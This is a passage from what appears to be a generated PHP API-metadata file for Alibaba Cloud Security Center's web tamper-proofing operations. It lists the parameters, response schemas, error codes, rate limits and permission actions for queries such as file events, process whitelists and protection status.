file.'."\n" .'* **txt**: TXT file.'."\n" .'* **idb**: IDB file.'."\n", 'type' => 'string', 'enumValueTitles' => [], 'example' => 'ldb', 'title' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TotalCount\\": 30,\\n \\"RequestId\\": \\"9CCD7D51-5E81-5FF5-BD74-813DDD248430\\",\\n \\"ExclusiveFileType\\": [\\n \\"ldb\\"\\n ]\\n}","type":"json"}]', 'title' => 'DescribeWebLockExclusiveFileType', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockExclusiveFileType'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWebLockExclusiveFileType', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeWebLockFileChangeStatistics' => [ 'summary' => 'Queries the file change statistics for web tamper-proofing.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paged query. Default value: 20. If you leave this parameter empty, 20 entries are returned per page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '709A8C3D-A543-5B79-AB75-361B206F71D9', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of web tamper-proofing events.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'List' => [ 'description' => 'The list of web tamper-proofing events.', 'type' => 'array', 'items' => [ 'description' => 'The web tamper-proofing event.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'The number of attempts.', 'type' => 'integer', 'format' => 'int32', 'example' => '33', 'title' => ''], 'File' => ['description' => 'The path of the file.', 'type' => 'string', 'example' => '/tmp', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query file change statistics for web tamper-proofing', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockFileChangeStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWebLockFileChangeStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"RequestId\\": \\"709A8C3D-A543-5B79-AB75-361B206F71D9\\",\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 200,\\n \\"List\\": [\\n {\\n \\"Count\\": 33,\\n \\"File\\": \\"/tmp\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeWebLockFileEvents' => [ 'summary' => 'Queries events on web tamper proofing.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas4GT4R7'], ], 'parameters' => [ [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The name of the asset.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to query the names of assets.'."\n", 'type' => 'string', 'required' => false, 'example' => 'test-ecs', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: **10**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'ProcessName', 'in' => 'query', 'schema' => ['description' => 'The name of the process.'."\n", 'type' => 'string', 'required' => false, 'example' => 'sys_create', 'title' => ''], ], [ 'name' => 'TsBegin', 'in' => 'query', 'schema' => ['description' => 'The beginning of the time range to query. The value is a UNIX timestamp.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1660649981419', 'title' => ''], ], [ 'name' => 'TsEnd', 'in' => 'query', 'schema' => ['description' => 'The end of the time range to query. The value is a UNIX timestamp.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1660649981419', 'title' => ''], ], [ 'name' => 'Dealed', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the event on web tamper proofing is handled. Valid values:'."\n" ."\n" .'* **n**: The event on web tamper proofing is handled.'."\n" .'* **y**: The event on web tamper proofing is not handled.'."\n", 'type' => 'string', 'required' => false, 'example' => 'n', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '79CFF74D-E967-5407-8A78-EE03B925FDAA', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of events on web tamper proofing returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'List' => [ 'description' => 'An array that consists of events on web tamper proofing returned.'."\n", 'type' => 'array', 'items' => [ 'description' => 'Information about the event on web tamper proofing.'."\n", 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the event on web tamper proofing. Valid values:'."\n" ."\n" .'* **1**: unhandled'."\n" .'* **2**: ignored'."\n" .'* **4**: deprecated'."\n" .'* **8**: marked as false positive'."\n" .'* **10**: added to the whitelist'."\n" .'* **16**: handling'."\n" .'* **32**: defended'."\n" .'* **64**: invalid'."\n" .'* **128**: deleted'."\n" .'* **512**: automatically handled'."\n", 'type' => 'string', 'example' => '1', 'title' => ''], 'EventName' => ['description' => 'The name of the event on web tamper proofing.'."\n", 'type' => 'string', 'example' => 'modify', 'title' => ''], 'Ds' => ['description' => 'The timestamp at which the event on web tamper proofing was first detected.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1657178400000', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the affected asset.'."\n", 'type' => 'string', 'example' => '8.210.XX.XX', 'title' => ''], 'ProcessPath' => ['description' => 'The path to the process.'."\n", 'type' => 'string', 'example' => 'C:\\Windows\\explorer.exe', 'title' => ''], 'Ip' => ['description' => 'The IP address of the asset.'."\n", 'type' => 'string', 'example' => '8.210.XX.XX', 'title' => ''], 'GmtEvent' => ['description' => 'The timestamp at which the event on web tamper proofing was last detected.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1657178400000', 'title' => ''], 'Count' => ['description' => 'The number of attempts.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the asset.'."\n", 'type' => 'string', 'example' => '172.25.XX.XX', 'title' => ''], 'ProcessName' => ['description' => 'The name of the process.'."\n", 'type' => 'string', 'example' => 'python3.7', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the asset.'."\n", 'type' => 'string', 'example' => '49e25e0f-bb51-4a5a-a1b3-13a4ddaa****', 'title' => ''], 'EventType' => ['description' => 'The prevention mode. Valid values:'."\n" ."\n" .'* **audit**: Interception Mode'."\n" .'* **web_lock**: Alert Mode'."\n", 'type' => 'string', 'example' => 'audit', 'title' => ''], 'InstanceName' => ['description' => 'The name of the asset.'."\n", 'type' => 'string', 'example' => 'sql-test-001', 'title' => ''], 'EventStatus' => ['description' => 'The status of the event on web tamper proofing. Valid values:'."\n" ."\n" .'* **1**: unhandled'."\n" .'* **2**: ignored'."\n" .'* **4**: deprecated'."\n" .'* **8**: marked as false positive'."\n" .'* **10**: added to the whitelist'."\n" .'* **16**: handling'."\n" .'* **32**: defended'."\n" .'* **64**: invalid'."\n" .'* **128**: deleted'."\n" .'* **512**: automatically handled'."\n", 'type' => 'string', 'example' => '1', 'title' => ''], 'Path' => ['description' => 'The file path.'."\n", 'type' => 'string', 'example' => ' '."\n" .'D:\\test-tamper-proofing\\123.html', 'title' => ''], 'Level' => ['description' => 'The severity of the event on web tamper proofing. Valid values: **medium**'."\n", 'type' => 'string', 'example' => 'medium', 'title' => ''], 'Id' => ['description' => 'The ID of the event on web tamper proofing.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '3555953980', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 2,\\n \\"RequestId\\": \\"79CFF74D-E967-5407-8A78-EE03B925FDAA\\",\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 100,\\n \\"List\\": [\\n {\\n \\"Status\\": \\"1\\",\\n \\"EventName\\": \\"modify\\",\\n \\"Ds\\": 1657178400000,\\n \\"InternetIp\\": \\"8.210.XX.XX\\",\\n \\"ProcessPath\\": \\"C:\\\\\\\\Windows\\\\\\\\explorer.exe\\",\\n \\"Ip\\": \\"8.210.XX.XX\\",\\n \\"GmtEvent\\": 1657178400000,\\n \\"Count\\": 10,\\n \\"IntranetIp\\": \\"172.25.XX.XX\\",\\n \\"ProcessName\\": \\"python3.7\\",\\n \\"Uuid\\": \\"49e25e0f-bb51-4a5a-a1b3-13a4ddaa****\\",\\n \\"EventType\\": \\"audit\\",\\n \\"InstanceName\\": \\"sql-test-001\\",\\n \\"EventStatus\\": \\"1\\",\\n \\"Path\\": \\"\\\\t\\\\nD:\\\\\\\\test-tamper-proofing\\\\\\\\123.html\\",\\n \\"Level\\": \\"medium\\",\\n \\"Id\\": 3555953980\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeWebLockFileEvents', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockFileEvents'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWebLockFileEvents', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'WebLockBind', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:weblockbind/*'], ], ], ], ], ], 'DescribeWebLockFileTypeSummary' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of web tamper-proofing events queried.', 'type' => 'integer', 'format' => 'int32', 'example' => '639', 'title' => ''], 'RequestId' => ['description' => 'The ID of this request, which is a unique identifier generated by Alibaba Cloud for the request. It can be used for troubleshooting and issue locating.', 'type' => 'string', 'example' => '4BB99533-4FDC-5B9C-A5E4-5AE3E9BE5C78', 'title' => ''], 'List' => [ 'description' => 'The list of web tamper-proofing events.', 'type' => 'array', 'items' => [ 'description' => 'A web tamper-proofing event.', 'type' => 'object', 'properties' => [ 'Type' => [ 'description' => 'The type of the protected file.'."\n" .'- **php**: .php file'."\n" .'- **jsp**: .jsp file'."\n" .'- **asp**: .asp file'."\n" .'- **aspx**: .aspx file'."\n" .'- **js**: .js file'."\n" .'- **cgi**: .cgi file'."\n" .'- **html**: .html file'."\n" .'- **htm**: .htm file'."\n" .'- **xml**: .xml file'."\n" .'- **shtml**: .shtml file'."\n" .'- **shtm**: .shtm file'."\n" .'- **jpg**: .jpg file'."\n" .'- **gif**: .gif file'."\n" .'- **png**: .png file', 'enumValueTitles' => [], 'type' => 'string', 'example' => 'jsp', 'title' => '', ], 'Count' => ['description' => 'The number of attempts.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query WebLock File Type Summary', 'summary' => 'Queries the WebLock file type summary.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockFileTypeSummary'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWebLockFileTypeSummary', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TotalCount\\": 639,\\n \\"RequestId\\": \\"4BB99533-4FDC-5B9C-A5E4-5AE3E9BE5C78\\",\\n \\"List\\": [\\n {\\n \\"Type\\": \\"jsp\\",\\n \\"Count\\": 3\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeWebLockInclusiveFileType' => [ 'summary' => 'Queries the file types supported by tamper-proofing protection.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of file types supported by tamper-proofing protection.', 'type' => 'integer', 'format' => 'int32', 'example' => '15', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'CE500770-42D3-442E-9DDD-156E0F9F3B45', 'title' => ''], 'InclusiveFileType' => [ 'description' => 'The list of file types supported by tamper-proofing protection.', 'type' => 'array', 'items' => [ 'description' => 'The file type supported by tamper-proofing protection.'."\n" .'- **php**: .php file'."\n" .'- **jsp**: .jsp file'."\n" .'- **asp**: .asp file'."\n" .'- **aspx**: .aspx file'."\n" .'- **js**: .js file'."\n" .'- **cgi**: .cgi file'."\n" .'- **html**: .html file'."\n" .'- **htm**: .htm file'."\n" .'- **xml**: .xml file'."\n" .'- **shtml**: .shtml file'."\n" .'- **shtm**: .shtm file'."\n" .'- **jpg**: .jpg file'."\n" .'- **gif**: .gif file'."\n" .'- **png**: .png file.', 'enumValueTitles' => [ 'htm' => 'htm', 'jpg' => 'jpg', 'cgi' => 'cgi', 'gif' => 'gif', 'jsp' => 'jsp', 'png' => 'png', 'js' => 'js', 'xml' => 'xml', 'aspx' => 'aspx', 'php' => 'php', 'html' => 'html', 'shtml' => 'shtml', 'shtm' => 'shtm', 'asp' => 'asp', ], 'type' => 'string', 'example' => 'jsp', 'title' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query tamper-proofing file types', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockInclusiveFileType'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWebLockInclusiveFileType', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TotalCount\\": 15,\\n \\"RequestId\\": \\"CE500770-42D3-442E-9DDD-156E0F9F3B45\\",\\n \\"InclusiveFileType\\": [\\n \\"jsp\\"\\n ]\\n}","type":"json"}]', ], 'DescribeWebLockProcessBlockStatistics' => [ 'summary' => 'Queries the statistics on processes for web tamper proofing.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: 1.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: 20. If you leave this parameter empty, 20 entries are returned on each page.'."\n" ."\n" .'> We recommend that you do not leave this parameter empty.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'BE120DAB-F4E7-4C53-ADC3-A97578ABF384', 'title' => ''], 'PageSize' => ['description' => 'The number of entries to return on each page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of processes.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'List' => [ 'description' => 'An array consisting of the statistics on processes.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The statistics on the process.'."\n", 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'The number of processes that are returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'Process' => ['description' => 'The process.'."\n", 'type' => 'string', 'example' => 'cron', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"RequestId\\": \\"BE120DAB-F4E7-4C53-ADC3-A97578ABF384\\",\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 100,\\n \\"List\\": [\\n {\\n \\"Count\\": 20,\\n \\"Process\\": \\"cron\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeWebLockProcessBlockStatistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockProcessBlockStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWebLockProcessBlockStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeWebLockProcessList' => [ 'summary' => 'Queries the processes for web tamper proofing.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas4GT4R7'], ], 'parameters' => [ [ 'name' => 'ProcessName', 'in' => 'query', 'schema' => ['description' => 'The name of the process.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cron', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the process is added to the process whitelist. Valid values:'."\n" ."\n" .'* **1**: The process is added to the process whitelist.'."\n" .'* **0**: The process is not added to the process whitelist.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: 1.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: 20. If you leave this parameter empty, 20 entries are returned on each page.'."\n" ."\n" .'> We recommend that you do not leave this parameter empty.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '028CF634-5268-5660-9575-48C9ED6BF880', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of processes.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'List' => [ 'description' => 'An array that consists of details about the process.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The details about the process.'."\n", 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'Indicates whether the process is added to the process whitelist. Valid values:'."\n" ."\n" .'* **1**: The process is added to the process whitelist.'."\n" .'* **0**: The process is not added to the process whitelist.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ProcessName' => ['description' => 'The name of the process.'."\n", 'type' => 'string', 'example' => 'cron', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'example' => '49e25e0f-bb51-4a5a-a1b3-13a4ddaa****', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.'."\n", 'type' => 'string', 'example' => '8.210.XX.XX', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server.'."\n", 'type' => 'string', 'example' => 'test_ecs', 'title' => ''], 'ProcessPath' => ['description' => 'The path to the process.'."\n", 'type' => 'string', 'example' => '/usr/sbin/cron', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'string', 'example' => '33', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.'."\n", 'type' => 'string', 'example' => '172.25.XX.XX', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"RequestId\\": \\"028CF634-5268-5660-9575-48C9ED6BF880\\",\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 200,\\n \\"List\\": [\\n {\\n \\"Status\\": 0,\\n \\"ProcessName\\": \\"cron\\",\\n \\"Uuid\\": \\"49e25e0f-bb51-4a5a-a1b3-13a4ddaa****\\",\\n \\"InternetIp\\": \\"8.210.XX.XX\\",\\n \\"InstanceName\\": \\"test_ecs\\",\\n \\"ProcessPath\\": \\"/usr/sbin/cron\\",\\n \\"Count\\": \\"33\\",\\n \\"IntranetIp\\": \\"172.25.XX.XX\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeWebLockProcessList', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockProcessList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWebLockProcessList', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'WebLockBind', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:weblockbind/*'], ], ], ], ], ], 'DescribeWebLockStatus' => [ 'summary' => 'Queries the tamper-proofing protection status.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '221.214.XXX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The identifier of the request source. Set this parameter to sas.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'WhiteCount' => ['description' => 'The number of processes in the whitelist.', 'type' => 'integer', 'format' => 'int32', 'example' => '6', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '0B48AB3C-84FC-424D-A01D-B9270EF46038', 'title' => ''], 'ExpireTime' => ['description' => 'The timestamp when the tamper-proofing authorization expires. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1688090851000', 'title' => ''], 'DirCount' => ['description' => 'The number of protected directories.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'AuthCount' => ['description' => 'The total number of purchased tamper-proofing authorizations.', 'type' => 'integer', 'format' => 'int32', 'example' => '32', 'title' => ''], 'BindCount' => ['description' => 'The number of bound tamper-proofing authorizations.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'BlockCount' => ['description' => 'The number of blocked processes.', 'type' => 'integer', 'format' => 'int32', 'example' => '48', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'InternalError', 'errorMessage' => 'The request processing has failed due to some unknown error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query tamper-proofing protection status', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWebLockStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n 